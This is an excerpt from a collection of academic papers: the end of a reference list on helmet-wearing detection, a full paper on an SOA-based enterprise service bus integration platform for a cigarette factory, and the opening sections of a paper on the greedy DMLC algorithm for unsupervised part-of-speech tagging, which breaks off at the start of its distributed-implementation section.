Li K, Zhao X, Bian J, Tan M. 2017a. Automatic safety helmet wearing detection. In: 2017 IEEE 7th annual international conference on CYBER technology in automation, control, and intelligent systems (CYBER). Piscataway: IEEE, 617–622.
Li J, Liu H, Wang T, Jiang M, Wang S, Li K, Zhao X. 2017b. Safety helmet wearing detection based on image processing and machine learning. In: 2017 Ninth International Conference on Advanced Computational Intelligence (ICACI). Piscataway: IEEE, 201–205.
Liu BC, Ivers R, Norton R, Boufous S, Blows S, Lo SK. 2008. Helmets for preventing injury in motorcycle riders. Cochrane Database of Systematic Reviews 1:CD004333 DOI 10.1002/14651858.CD004333.pub3.
Liu XH, Ye XN. 2014. Skin color detection and hu moments in helmet recognition research. Journal of East China University of Science and Technology 3:365–370.
Long X, Cui W, Zheng Z. 2019. Safety helmet wearing detection based on deep learning. In: 2019 IEEE 3rd information technology, networking, electronic and automation control conference (ITNEC). Piscataway: IEEE, 2495–2499.
Redmon J, Divvala S, Girshick R, Farhadi A. 2016. You only look once: unified, real-time object detection. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 779–788.
Ren S, He K, Girshick R, Sun J. 2015. Faster R-CNN: towards real-time object detection with region proposal networks. In: Advances in neural information processing systems. 91–99.
Rubaiyat AH, Toma TT, Kalantari-Khandani M, Rahman SA, Chen L, Ye Y, Pan CS. 2016. Automatic detection of helmet uses for construction safety. In: 2016 IEEE/WIC/ACM International Conference on Web Intelligence Workshops (WIW). Piscataway: IEEE, 135–142.
Schapire RE. 1990. The strength of weak learnability. Machine Learning 5(2):197–227.
Shi H, Chen X, Yang Y. 2019. Safety helmet wearing detection method of improved YOLOv3. Computer Engineering and Applications 55:213–220 DOI 10.3778/j.issn.1002-8331.1811-0389.
Siebert FW, Lin H. 2020. Detecting motorcycle helmet use with deep learning. Accident Analysis & Prevention 134:105319 DOI 10.1016/j.aap.2019.105319.
Thompson DC, Rivara F, Thompson R. 1999. Helmets for preventing head and facial injuries in bicyclists. Cochrane Database of Systematic Reviews 1992(2):CD001855 DOI 10.1002/14651858.CD001855.
World Health Organization. 2006. Helmets: a road safety manual for decision-makers and practitioners. Geneva: World Health Organization.
Yunbo LIU, Huang H. 2015. Research on monitoring of workers' helmet wearing at the construction site. Electronic Science and Technology 28(4):69–72.
work_35tjy7sldnhtrdrp4eqtj2nuw4 ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-003

Research on Enterprise Application Integration Platform Based on SOA Architecture

Liu Pingping
School of Computer Science and Engineering
Xi'an Technological University
Xi'an, 710021, China
E-mail: 1341369601@qq.com

Lu Jiaxing
School of Computer Science and Engineering
Xi'an Technological University
Xi'an, 710021, China
E-mail: 1721653661@qq.com

Abstract—The tobacco industry was one of the earliest industries in China to pursue informatization, and it now faces a number of problems: a lack of overall planning, a wide range of application systems with a low degree of integration of information resources, and a serious "information island" problem. To establish an efficient and flexible way of exchanging information within the enterprise, an enterprise application integration platform based on the SOA architecture is proposed. The platform takes the ESB as its core, transforms enterprise information integration into a new approach that conforms to the SOA architecture, and introduces the idea of basic data management, so as to optimize the information resources of the enterprise as a whole.

Keywords-SOA Framework; Information Interaction; ESB; Information Integration

I. INTRODUCTION

SOA (Service Oriented Architecture) has been widely used in the IT industry in the 21st century. SOA is an architecture, not a technology or a method; it can also be regarded as an idea. In China, many enterprises have begun to build enterprise integration platforms based on SOA, for example Kingdee Apusic SOA. FMQM Exotica, developed by IBM's Almaden laboratory, is a distributed workflow management system based on persistent message queues, which can save workflow execution information through the persistent message queue and make all nodes in the execution process completely independent.

SOA has three significant advantages: loose coupling, coarse granularity, and location and protocol transparency. Comprehensive loose coupling is achieved through the encapsulation of services; loose coupling reduces the dependency between services, so that the flexibility of each service is improved and it is not forced to change because other services change, which greatly improves the reusability of services. Coarse granularity means that the interface of a service defined in SOA is close to the actual user operation. Location and protocol transparency means that when accessing a service defined by SOA, you do not need to know the specific location and transport protocol of the service; even if the location and transport protocol of the service change, the client that invokes the service does not need to change.

Based on an investigation and analysis of the problems of information islands, high coupling, and poor integration extensibility among the systems of the BJ cigarette factory, this paper proposes an enterprise application integration platform design scheme based on the SOA architecture that suits the actual situation of the enterprise and solves the current problems.
Therefore, based on research into the practical application of an SOA-based enterprise application integration platform in cigarette enterprises, on the SOA architecture and ESB technology, and on an analysis of the actual information integration problems of cigarette manufacturing enterprises, this paper puts forward a design scheme for an enterprise application integration platform adapted to the actual situation of the enterprise.

II. THE CURRENT SITUATION

The tobacco industry started information construction early in China, and at present its level of informatization is generally high. The BJ cigarette factory, as the main cigarette manufacturing enterprise in Shaanxi Province, has accumulated many application systems after years of information construction, covering all aspects of the factory from production to management. The main information systems include the manufacturing execution system (MES), the enterprise resource planning (ERP) system, the logistics system, the workshop data acquisition system, the centralized control system of the cut-tobacco (silk making) workshop, the power and energy management system, the human resource management system, the enterprise card system, and so on.

As the number of application systems grows, the problems are not only the disunity of basic data but also the complexity of system integration. The traditional integration method generally adopts a point-to-point mode, in which each pair of systems needs a dedicated channel to achieve integration. As shown in Figure 1, the integration of N application systems generates N * (N-1) integration channels, with high complexity, and whenever a new application system needs to be integrated the complexity rises sharply.

Figure 1. Integration complexity

In summary, the current informatization problems of the BJ cigarette factory mainly include the following aspects:

1) There are isolated information islands: some application systems are in an information-closed state due to the lack of external integration means.

2) The basic data of the enterprise is scattered across different application systems and has to be maintained separately, so it is difficult to ensure the unity of the basic data of the whole enterprise, that is, a single authoritative source for each data item. The lack of a unified basic data coding system makes information interaction difficult.

3) Basic data depends on a business system and is highly coupled to it. At present, the basic data of the enterprise mainly depends on the ERP system, yet the purpose of basic data is to provide the most fundamental data for all application systems of the whole enterprise, so relying on a single application system causes unnecessary impact on the other users of the basic data.

4) Integration scalability is poor. At present, the information systems of the whole enterprise adopt the point-to-point integration mode. If a new application system wants to join the integration system, it needs the cooperation of every existing application system, and upgrading or transforming an existing application system also involves a large number of external interface changes; hence the poor scalability.

5) The lack of management and monitoring of the data interaction process makes it difficult to find and deal with problems in the data interaction process in time. Some data have high timeliness requirements.
If such data cannot be communicated in time, the actual business is significantly affected. Therefore, effective management and monitoring measures are needed for the data interaction process.

6) Point-to-point integration aggravates the network burden: much of the exchanged data is repeated, yet it cannot be reused, resulting in a waste of resources.

Analyzing and addressing the enterprise's current problems comes down, at its core, to establishing a reasonable and efficient way of integrating information. In recent years, with the continuous development of information integration technology and the formulation of a series of standards and specifications, a new solution has gradually attracted attention: enterprise application integration (EAI) based on Service Oriented Architecture (SOA). It regards each application system in the enterprise as a service unit of the SOA architecture and establishes an enterprise application integration platform to realize information integration between the application systems. In this enterprise application integration platform, an enterprise service bus (ESB) is needed to provide standardized services. The enterprise service bus is the service operation support platform in the SOA architecture, and the services encapsulated by the other application systems run on this service bus; as shown in Figure 2, its establishment can effectively improve the enterprise's current disordered, mesh-like integration mode. Secondly, we need to establish a data exchange management platform to manage all services running on the enterprise service bus and to monitor the data interaction process in the integration. Finally, we need to establish a basic data management platform, as a service provider in the SOA architecture, to provide basic data management functions for the other application systems. The basic data management platform integrates the basic data of the other application systems and manages it uniformly, so the other systems no longer need to maintain it separately.

Figure 2. Schematic diagram of optimized enterprise integration channel

III. DESIGN AND IMPLEMENTATION

Because IBM WMB (WebSphere Message Broker) is used as the enterprise service bus, IBM DB2 is used as the database and IBM WAS (WebSphere Application Server) is used as the application server for better overall stability. According to the requirements analysis, the data exchange platform, acting as the enterprise service bus, provides a unified entry service, WS?MB. After another application system calls this service, the ESB parses and routes the incoming message and finds the corresponding registered business-processing web service to call. The data exchange management platform is responsible for the management and monitoring of the IBM WMB enterprise service bus. In the data exchange management platform, it is necessary to provide management functions such as registering, modifying, disabling, and reusing the business-processing services. At the same time, the data exchange management platform should also log the data that is sent, so as to complete the monitoring of the data exchange process.

Figure 3. Technical framework of the platform

IV. DESIGN OF THE ENTERPRISE SERVICE BUS DATA EXCHANGE PLATFORM

As the core module of the enterprise application integration platform, the data exchange platform undertakes the important work of message transmission.
Figure 4 shows the basic data exchange process. The data exchange platform publishes a unified entry service, WS?MB, as a web service. The service caller first calls this service and sends the call request to the data exchange platform in the form of an XML message. The data exchange platform analyzes the message content, finds the actual service to call, and forwards the message to the actual service provider; the service provider returns the processed result to the data exchange platform in the form of an XML message, and the data exchange platform then returns it to the original caller.

Figure 4. Flow chart of data exchange

The request message sent by the service caller should contain complete routing information, so how should the routing information be defined? From the data exchange process it can be seen that the three elements of data sender, data receiver, and the service to be called uniquely determine a data flow, so the routing information should also contain these three elements. The unified format of the service call request XML message is defined as follows:

<ID></ID>                // message ID or serial number
<name></name>            // message description
<source></source>        // data source
<target></target>        // data destination
<sername></sername>      // called service ID
<msgtype></msgtype>      // type of message (0: normal, 1: request, 2: answer)
<rtcode></rtcode>        // return value of the corresponding request (1: success, 0: failure)
<rtdesc></rtdesc>        // return description of the corresponding request
<backup1></backup1>      // reserved (standby) information
<date>XXXX/XX/XX XX:XX:XX</date>   // message sending time
<Table>
  <Row> ... </Row>
</Table>                 // the main body of the data being sent

Here Table represents a data table and Row represents a specific data record. A Table can be nested inside another Table to represent master-detail (parent and child table) data.
In the XML definition, the head part describes the basic information of the data, and the three attributes source, target, and sername are the most important routing information. Through these three attributes the service that the data needs to call can be uniquely determined, that is, the consumer of the service, the provider of the service, and the name of the service. These attributes are registered through the service management module; after the unified entry service receives the XML data, it calls the corresponding service to deliver the data according to these three attributes and the service registration information in the management module.

V. IMPLEMENTATION

The main functions of the data exchange management platform are service management and monitoring of the data exchange process. Figure 5 shows the main interface of the data exchange management platform. The frequency of data exchange can be calculated from the logs, and the volume of data received and sent by each system accessing the platform can be displayed intuitively.

Figure 5. Main interface of data exchange management platform

a) The service governance function is realized by registering and managing the web services published by each application system. As shown in Figure 6, the contents to be registered include: sequence number, system name, interface name, enabling tag, source, target, interface service name, WebService URL, namespace, calling method input object, input parameter name, output parameter name, calling method output object, extended input parameter, extended input parameter value, authentication information, WebService technology, remarks, and so on (for confidentiality reasons, the figure is not complete).

b) Figure 7 shows the implementation interface of the authority management function of the basic data management platform. The maintenance of basic data is usually carried out by the personnel in charge of the specific business, and different business personnel are usually responsible for different data. The authority management module can configure the add, modify, delete, and query permissions for various kinds of basic data according to different roles, and can also configure whether specific attributes are visible. The RBAC (role-based access control) model is adopted.

Figure 6. Data operation module

First, different roles are configured in role management; then the permissions of each role are configured through the role-function relationship; finally, the roles of different users are configured through the role-user or user-role relationship. A user can have multiple roles, and a role can be held by multiple users at the same time.

Figure 8 shows the implementation of the data synchronization module of the basic data management platform. By customizing the interface content and configuring different sending interfaces for different systems, one can configure whether each attribute column of the basic data is sent, the name of the sent column, and so on, and the sent content can also be filtered and grouped through SQL statements.

Figure 7. Authority management
Figure 8. Definition of interface service

The other application systems publish the services that receive basic data and register them in the data exchange management platform.
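As an illustration of how the unified entry service might dispatch on the three routing attributes, the following Python sketch parses a request message in the format defined in Section IV and looks up the registered target service. The registry structure, example entries, and function names are hypothetical and are not part of the platform described in the paper, which is implemented on IBM WMB/WAS.

import xml.etree.ElementTree as ET

# Hypothetical service registry keyed by the three routing attributes
# (source system, target system, service name), mirroring the registration
# contents managed by the data exchange management platform.
SERVICE_REGISTRY = {
    ("MES", "ERP", "SyncMaterial"): "http://example.local/erp/SyncMaterialService",
}

def route_message(xml_text):
    """Parse a request message and return the endpoint of the registered
    business-processing web service it should be forwarded to.
    A single root element wrapping the fields (e.g. <msg>...</msg>) is assumed."""
    msg = ET.fromstring(xml_text)
    source = msg.findtext("source")
    target = msg.findtext("target")
    sername = msg.findtext("sername")
    endpoint = SERVICE_REGISTRY.get((source, target, sername))
    if endpoint is None:
        raise LookupError("No service registered for %s" % str((source, target, sername)))
    return endpoint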
After the interface is configured in the basic data management platform, whenever maintenance of new basic data is completed, the platform automatically sends the data to the corresponding systems through the data exchange platform according to the interface configuration. All application systems adopt this mode, and the basic data is thus kept unified.

VI. CONCLUSION

In this paper, after studying the application status of the SOA architecture in the BJ cigarette enterprise, an enterprise integrated information system based on the SOA architecture is proposed to solve the enterprise's current problems of information islands, high coupling between systems, and poor integration scalability. The basic data management platform manages and synchronizes the basic data of the whole enterprise in a centralized way, so as to solve the application system integration problems caused by data inconsistency.

work_37wft6eehnazxaxgenjumsuamm ---- Parallel Algorithms for Unsupervised Tagging

Sujith Ravi
Google
Mountain View, CA 94043
sravi@google.com

Sergei Vassilivitskii
Google
Mountain View, CA 94043
sergeiv@google.com

Vibhor Rastogi∗
Twitter
San Francisco, CA
vibhor.rastogi@gmail.com

∗ The research described herein was conducted while the author was working at Google.

Abstract

We propose a new method for unsupervised tagging that finds minimal models which are then further improved by Expectation Maximization training. In contrast to previous approaches that rely on manually specified and multi-step heuristics for model minimization, our approach is a simple greedy approximation algorithm DMLC (DISTRIBUTED-MINIMUM-LABEL-COVER) that solves this objective in a single step. We extend the method and show how to efficiently parallelize the algorithm on modern parallel computing platforms while preserving approximation guarantees.
We demonstrate the power of the new algorithm by evaluating on various sequence labeling tasks: Part-of-Speech tagging for multiple languages (including low-resource languages), with complete and incomplete dictionaries, and supertagging, a complex sequence labeling task, where the grammar size alone can grow to millions of entries. Our results show that for all of these settings, our method achieves state-of-the-art scalable performance that yields high quality tagging outputs.

1 Introduction

Supervised sequence labeling with large labeled training datasets is considered a solved problem. For instance, state of the art systems obtain tagging accuracies over 97% for part-of-speech (POS) tagging on the English Penn Treebank. However, learning accurate taggers without labeled data remains a challenge. The accuracies quickly drop when faced with data from a different domain, language, or when there is very little labeled information available for training (Banko and Moore, 2004).

Recently, there has been an increasing amount of research tackling this problem using unsupervised methods. A popular approach is to learn from POS-tag dictionaries (Merialdo, 1994), where we are given a raw word sequence and a dictionary of legal tags for each word type. Learning from POS-tag dictionaries is still challenging. Complete word-tag dictionaries may not always be available for use and in every setting. When they are available, the dictionaries are often noisy, resulting in high tagging ambiguity. Furthermore, when applying taggers in new domains or different datasets, we may encounter new words that are missing from the dictionary. There have been some efforts to learn POS taggers from incomplete dictionaries by extending the dictionary to include these words using some heuristics (Toutanova and Johnson, 2008) or using other methods such as type-supervision (Garrette and Baldridge, 2012).

In this work, we tackle the problem of unsupervised sequence labeling using tag dictionaries. The first reported work on this problem was on POS tagging from Merialdo (1994). The approach involved training a standard Hidden Markov Model (HMM) using the Expectation Maximization (EM) algorithm (Dempster et al., 1977), though EM does not perform well on this task (Johnson, 2007). More recent methods have yielded better performance than EM (see (Ravi and Knight, 2009) for an overview).

One interesting line of research introduced by Ravi and Knight (2009) explores the idea of performing model minimization followed by EM training to learn taggers. Their idea is closely related to the classic Minimum Description Length principle for model selection (Barron et al., 1998). They (1) formulate an objective function to find the smallest model that explains the text (model minimization step), and then, (2) fit the minimized model to the data (EM step). For POS tagging, this method (Ravi and Knight, 2009) yields the best performance to date; 91.6% tagging accuracy on a standard test dataset from the English Penn Treebank. The original work from (Ravi and Knight, 2009) uses an integer linear programming (ILP) formulation to find minimal models, an approach which does not scale to large datasets. Ravi et al. (2010b) introduced a two-step greedy approximation to the original objective function (called the MIN-GREEDY algorithm) that runs much faster while maintaining the high tagging performance.
Garrette and Baldridge (2012) showed how to use several heuristics to further improve this algorithm (for instance, better choice of tag bigrams when breaking ties) and stack other techniques on top, such as careful initialization of HMM emission models, which results in further performance gains. Their method also works under incomplete dictionary scenarios and can be applied to certain low-resource scenarios (Garrette and Baldridge, 2013) by combining model minimization with supervised training.

In this work, we propose a new scalable algorithm for performing model minimization for this task. By making an assumption on the structure of the solution, we prove that a variant of the greedy set cover algorithm always finds an approximately optimal label set. This is in contrast to previous methods that employ heuristic approaches with no guarantee on the quality of the solution. In addition, we do not have to rely on ad hoc tie-breaking procedures or careful initializations for unknown words. Finally, not only is the proposed method approximately optimal, it is also easy to distribute, allowing it to easily scale to very large datasets. We show empirically that our method, combined with an EM training step, outperforms existing state of the art systems.

1.1 Our Contributions

• We present a new method, DISTRIBUTED MINIMUM LABEL COVER, DMLC, for model minimization that uses a fast, greedy algorithm with formal approximation guarantees to the quality of the solution.

• We show how to efficiently parallelize the algorithm while preserving approximation guarantees. In contrast, existing minimization approaches cannot match the new distributed algorithm when scaling from thousands to millions or even billions of tokens.

• We show that our method easily scales to both large data and grammar sizes, and does not require the corpus or label set to fit into memory. This allows us to tackle complex tagging tasks, where the tagset consists of several thousand labels, which results in more than one million entries in the grammar.

• We demonstrate the power of the new method by evaluating under several different scenarios: POS tagging for multiple languages (including low-resource languages), with complete and incomplete dictionaries, as well as a complex sequence labeling task of supertagging. Our results show that for all these settings, our method achieves state-of-the-art performance yielding high quality taggings.

2 Related Work

Recently, there has been an increasing amount of research tackling this problem from multiple directions. Some efforts have focused on inducing POS tag clusters without any tags (Christodoulopoulos et al., 2010; Reichart et al., 2010; Moon et al., 2010), but evaluating such systems proves difficult since it is not straightforward to map the cluster labels onto gold standard tags. A more popular approach is to learn from POS-tag dictionaries (Merialdo, 1994; Ravi and Knight, 2009), incomplete dictionaries (Hasan and Ng, 2009; Garrette and Baldridge, 2012) and human-constructed dictionaries (Goldberg et al., 2008).

Another direction that has been explored in the past includes bootstrapping taggers for a new language based on information acquired from other languages (Das and Petrov, 2011) or limited annotation resources (Garrette and Baldridge, 2013). Additional work focused on building supervised taggers for noisy domains such as Twitter (Gimpel et al., 2011).
While most of the relevant work in this area centers on POS tagging, there has been some work done on building taggers for more complex sequence labeling tasks such as supertagging (Ravi et al., 2010a).

Other related work includes alternative methods for learning sparse models via priors in Bayesian inference (Goldwater and Griffiths, 2007) and posterior regularization (Ganchev et al., 2010). But these methods only encourage sparsity and do not explicitly seek to minimize the model size, which is the objective function used in this work. Moreover, taggers learned using model minimization have been shown to produce state-of-the-art results for the problems discussed here.

3 Model

Following Ravi and Knight (2009), we formulate the problem as that of label selection on the sentence graph. Formally, we are given a set of sequences, $S = \{S_1, S_2, \ldots, S_n\}$, where each $S_i$ is a sequence of words, $S_i = w_{i1}, w_{i2}, \ldots, w_{i,|S_i|}$. With each word $w_{ij}$ we associate a set of possible tags $T_{ij}$. We will denote by m the total number of (possibly duplicate) words (tokens) in the corpus.

Additionally, we define two special words $w_0$ and $w_\infty$ with special tags start and end, and consider the modified sequences $S'_i = w_0, S_i, w_\infty$. To simplify notation, we will refer to $w_\infty = w_{|S_i|+1}$.

The sequence label problem asks us to select a valid tag $t_{ij} \in T_{ij}$ for each word $w_{ij}$ in the input to minimize a specific objective function. We will refer to a tag pair $(t_{i,j-1}, t_{ij})$ as a label. Our aim is to minimize the number of distinct labels used to cover the full input. Formally, given a sequence $S'_i$ and a tag $t_{ij}$ for each word $w_{ij}$ in $S'_i$, let the induced set of labels for sequence $S'_i$ be

$L_i = \bigcup_{j=1}^{|S'_i|} \{(t_{i,j-1}, t_{ij})\}$.

The total number of distinct labels used over all sequences is then

$\phi = \left| \bigcup_i L_i \right| = \left| \bigcup_i \bigcup_{j=1}^{|S_i|+1} \{(t_{i,j-1}, t_{ij})\} \right|$.

Note that the order of the tokens in the label makes a difference, as {(NN, VP)} and {(VP, NN)} are two distinct labels.

Now we can define the problem formally, following (Ravi and Knight, 2009).

Problem 1 (Minimum Label Cover). Given a set S of sequences of words, where each word $w_{ij}$ has a set of valid tags $T_{ij}$, the problem is to find a valid tag assignment $t_{ij} \in T_{ij}$ for each word that minimizes the number of distinct labels or tag pairs over all sequences, $\phi = |\bigcup_i \bigcup_{j=1}^{|S_i|+1} \{(t_{i,j-1}, t_{ij})\}|$.

The problem is closely related to the classical Set Cover problem and is also NP-complete. To reduce Set Cover to the label selection problem, map each element i of the Set Cover instance to a single word sentence $S_i = w_{i1}$, and let the valid tags $T_{i1}$ contain the names of the sets that contain element i. Consider a solution to the label selection problem; every sentence $S_i$ is covered by two labels $(w_0, k_i)$ and $(k_i, w_\infty)$, for some $k_i \in T_{i1}$, which corresponds to an element i being covered by set $k_i$ in the Set Cover instance. Thus any valid solution to the label selection problem leads to a feasible solution to the Set Cover problem ($\{k_1, k_2, \ldots\}$) of exactly half the size.

Finally, we will use $\{\{\ldots\}\}$ notation to denote a multiset of elements, i.e. a set where an element may appear multiple times.

4 Algorithm

In this section, we describe the DISTRIBUTED-MINIMUM-LABEL-COVER, DMLC, algorithm for approximately solving the minimum label cover problem. We describe the algorithm in a centralized setting, and defer the distributed implementation to Section 5. Before describing the algorithm, we briefly explain the relationship of the minimum label cover problem to set cover.
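To make the objective $\phi$ in Problem 1 concrete, the small Python function below counts the distinct labels induced by a candidate tag assignment; each input sequence is the list of chosen tags for $S'_i$, already padded with the special start and end tags. This is an illustration of the definition only, not part of the DMLC algorithm.

def count_labels(tagged_sequences):
    """phi = number of distinct (t_{i,j-1}, t_{ij}) pairs over all sequences.
    Each element of tagged_sequences is the chosen tag sequence for S'_i,
    i.e. it already starts with 'start' and ends with 'end'."""
    labels = set()
    for tags in tagged_sequences:
        labels.update(zip(tags, tags[1:]))   # ordered tag bigrams
    return len(labels)

# Example:
# count_labels([["start", "DT", "NN", "VB", "end"],
#               ["start", "DT", "NN", "end"]])   # -> 5 distinct labels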
4.1 Modification of Set Cover

As we pointed out earlier, the minimum label cover problem is at least as hard as the Set Cover problem. An additional challenge comes from the fact that labels are tags for a pair of words, and hence are related. For example, if we label a word pair (wi,j−1, wij) as (NN, VP), then the label for the next word pair (wij, wi,j+1) has to be of the form (VP, *), i.e., it has to start with VP. Previous work (Ravi et al., 2010a; Ravi et al., 2010b) recognized this challenge and employed two-phase heuristic approaches. Eschewing heuristics, we will show that with one natural assumption, even with this extra set of constraints, the standard greedy algorithm for this problem results in a solution with a provable approximation ratio of O(log m). In practice, however, the algorithm performs far better than the worst-case ratio, and similar to the work of (Gomes et al., 2006), we find that the greedy approach selects a cover approximately 11% worse than the optimum solution.

Algorithm 1: MLC Algorithm
1: Input: A set of sequences S with each word wij having possible tags Tij.
2: Output: A tag assignment tij ∈ Tij for each word wij approximately minimizing labels.
3: Let M be the multiset of all possible labels generated by choosing each possible tag t ∈ Tij:
$$M = \bigcup_i \bigcup_{j=1}^{|S_i|+1} \bigcup_{\substack{t' \in T_{i,j-1} \\ t \in T_{ij}}} \{\{(t', t)\}\} \qquad (1)$$
4: Let L = ∅ be the set of selected labels.
5: repeat
6:   Select the most frequent label not yet selected: (t′, t) = arg max(s′,s)∉L |M ∩ (s′, s)|.
7:   For each bigram (wi,j−1, wij) where t′ ∈ Ti,j−1 and t ∈ Tij, tentatively assign t′ to wi,j−1 and t to wij. Add (t′, t) to L.
8:   If a word gets two assignments, select one at random with equal probability.
9:   If a bigram (wij, wi,j+1) is consistent with the assignments in (t, t′), fix the tentative assignments, and set Ti,j−1 = {t′} and Tij = {t}. Recompute M, the multiset of possible labels, with the updated Ti,j−1 and Tij.
10: until there are no unassigned words

Algorithm 2: DMLC Implementation
1: Input: A set of sequences S with each word wij having possible tags Tij.
2: Output: A tag assignment tij ∈ Tij for each word wij approximately minimizing labels.
3: (Graph Creation) Initialize each vertex vij with the set of possible tags Tij and its neighbors vi,j+1 and vi,j−1.
4: repeat
5:   (Message Passing) Each vertex vij sends its possible tags Tij to its forward neighbor vi,j+1.
6:   (Counter Update) Each vertex receives the tags Ti,j−1 and adds all possible labels {(s, s′) | s ∈ Ti,j−1, s′ ∈ Tij} to a global counter (M).
7:   (MaxLabel Selection) Each vertex queries the global counter M to find the maximum label (t, t′).
8:   (Tentative Assignment) Each vertex vij selects a tag tentatively as follows: if one of the tags t, t′ is in the feasible set Tij, it tentatively selects the tag.
9:   (Random Assignment) If both are feasible, it selects one at random. The vertex communicates its assignment to its neighbors.
10:  (Confirmed Assignment) Each vertex receives the tentative assignment from its neighbors. If together with its neighbors it can match the selected label, the assignment is finalized. If the assigned tag is t, then the vertex vij sets the valid tag set Tij to {t}.
11: until no unassigned vertices exist.

4.2 MLC Algorithm

We present in Algorithm 1 our MINIMUM LABEL COVER algorithm to approximately solve the minimum label cover problem. The algorithm is simple, efficient, and easy to distribute.
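For readers who prefer running code to pseudocode, the sketch below is a simplified single-machine rendering of the greedy loop of Algorithm 1, written by us for illustration. It collapses Steps 7–9 (tentative assignments are fixed immediately and the random tie-breaking is omitted), so it conveys the flow of the method rather than reproducing the exact procedure.

```python
from collections import Counter

def mlc_greedy(tag_sets):
    """Greedy label-cover sketch. tag_sets[i][j] is the set of feasible tags for
    word j of sentence i; boundaries get the pseudo-tags 'start' and 'end'."""
    feasible = [[{"start"}] + [set(t) for t in sent] + [{"end"}] for sent in tag_sets]
    chosen = []                                    # selected labels, in order
    while True:
        counts = Counter()                         # multiset M of possible labels
        undecided = False
        for sent in feasible:
            for j in range(1, len(sent)):
                if len(sent[j - 1]) > 1 or len(sent[j]) > 1:
                    undecided = True
                for prev in sent[j - 1]:
                    for cur in sent[j]:
                        if (prev, cur) not in chosen:
                            counts[(prev, cur)] += 1
        if not undecided or not counts:
            break
        label = counts.most_common(1)[0][0]        # greedy step: most frequent label
        chosen.append(label)
        prev, cur = label
        for sent in feasible:                      # fix every bigram the label covers
            for j in range(1, len(sent)):
                if prev in sent[j - 1] and cur in sent[j]:
                    sent[j - 1], sent[j] = {prev}, {cur}
    return feasible, chosen

# Toy run: two short sentences with ambiguous tag sets (invented for illustration).
demo = [[{"DT"}, {"NN", "VB"}, {"VB", "NN"}],
        [{"DT"}, {"NN"}, {"VB", "NN"}]]
print(mlc_greedy(demo)[1])
```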
The algorithm chooses labels one at a time, select- ing a label that covers as many words as possible in every iteration. For this, it generates and maintains a multi-set of all possible labels M (Step 3). The multi-set contains an occurrence of each valid label, for example, if wi,j−1 has two possible valid tags NN and VP, and wij has one possible valid tag VP, then M will contain two labels, namely (NN, VP) and (VP, VP). Since M is a multi-set it will contain duplicates, e.g. the label (NN, VP) will appear for each adjacent pair of words that have NN and VP as valid tags, respectively. In each iteration, the algorithm picks a label with the most number of occurrences in M and adds it to the set of chosen labels (Step 6). Intuitively, this is a greedy step to select a label that covers the most number of word pairs. Once the algorithm picks a label (t′, t), it tries to assign as many words to tags t or t′ as possible (Step 7). A word can be assigned t′ if t′ is a valid tag for it, and t a valid tag for the next word in sequence. Similarly, a word can be assigned t, if t is a valid tag for it, and t′ a valid tag for the previous word. Some words can get both assignments, in which case we choose one tentatively at random (Step 8). If a word’s tentative random tag, say t, is consistent with the choices of its adjacent words (say t′ from the previous word), then the tentative choice is fixed as a permanent one. Whenever a tag is selected, the set of valid tags Tij for the word is reduced to a sin- gleton {t}. Once the set of valid tags Tij changes, the multi-set M of all possible labels also changes, as seen from Eq 1. The multi-set is then recom- puted (Step 9) and the iterations repeated until all of words have been tagged. We can show that under a natural assumption this simple algorithm is approximately optimal. Assumption 1 (c-feasibility). Let c ≥ 1 be any num- ber, and k be the size of the optimal solution to the original problem. In each iteration, the MLC algo- rithm fixes the tags for some words. We say that the algorithm is c-feasible, if after each iteration there exists some solution to the remaining problem, con- sistent with the chosen tags, with size at most ck . The assumption encodes the fact that a single bad greedy choice is not going to destroy the overall structure of the solution, and a nearly optimal so- lution remains. We note that this assumption of c- feasibility is not only sufficient, as we will formally show, but is also necessary. Indeed, without any as- sumptions, once the algorithm fixes the tag for some words, an optimal label may no longer be consis- tent with the chosen tags, and it is not hard to find contrived examples where the size of the optimal so- lution doubles after each iteration of MLC. Since the underlying problem is NP-complete, it is computationally hard to give direct evidence ver- ifying the assumption on natural language inputs. However, on small examples we are able to show that the greedy algorithm is within a small constant factor of the optimum, specifically it is within 11% of the optimum model size for the POS tagging problem using the standard 24k dataset (Ravi and Knight, 2009). Combined with the fact that the final method outperforms state of the art approaches, this leads us to conclude that the structural assumption is well justified. Lemma 1. Under the assumption of c-feasibility, the MLC algorithm achieves a O(c log m) approx- imation to the minimum label cover problem, where m = ∑ i |Si| is the total number of tokens. Proof. 
To prove the Lemma we will define an objective function φ̄, counting the number of unlabeled word pairs, as a function of possible labels, and show that φ̄ decreases by a factor of (1 − O(1/ck)) at every iteration.

To define φ̄, we first define φ, the number of labeled word pairs. Consider a particular set of labels, L = {L1, L2, ..., Lk}, where each label is a pair (ti, tj). Call {tij} a valid assignment of tokens if for each wij we have tij ∈ Tij. Then the score of L under an assignment t, which we denote by φt, is the number of bigram labels that appear in L. Formally,

$$\phi_t(L) = \Bigl|\bigcup_{i,j} \{\{(t_{i,j-1}, t_{ij})\}\} \cap L\Bigr|.$$

Finally, we define φ(L) to be the best such assignment, φ(L) = maxt φt(L), and φ̄(L) = m − φ(L) the number of uncovered labels.

Consider the label selected by the algorithm in every step. By the c-feasibility assumption, there exists some solution having ck labels. Thus, some label from that solution covers at least a 1/ck fraction of the remaining words. The selected label (t, t′) maximizes the intersection with the remaining feasible labels. The conflict resolution step ensures that in expectation the realized benefit is at least a half of the maximum, thereby reducing φ̄ by at least a (1 − 1/2ck) fraction. Therefore, after O(kc log m) operations all of the labels are covered.

4.3 Fitting the Model Using EM

Once the greedy algorithm terminates and returns a minimized grammar of tag bigrams, we follow the approach of Ravi and Knight (2009) and fit the minimized model to the data using the alternating EM strategy.

In this step, we run an alternating optimization procedure iteratively in phases. In each phase, we initialize (and prune away) parameters within the two HMM components (transition or emission model) using the output from the previous phase. We initialize this procedure by restricting the transition parameters to only those tag bigrams selected in the model minimization step. We train in conjunction with the original emission model using the EM algorithm, which prunes away some of the emission parameters. In the next phase, we alternate the initialization by choosing the pruned emission model along with the original transition model (with the full set of tag bigrams) and retrain using EM. The alternating EM iterations are terminated when the change in the size of the observed grammar (i.e., the number of unique bigrams in the tagging output) is ≤ 5%.¹ We refer to our entire approach using greedy minimization followed by EM training as DMLC + EM.

¹For more details on the alternating EM strategy and how initialization with minimized models improves EM performance in alternating iterations, refer to (Ravi and Knight, 2009).

5 Distributed Implementation

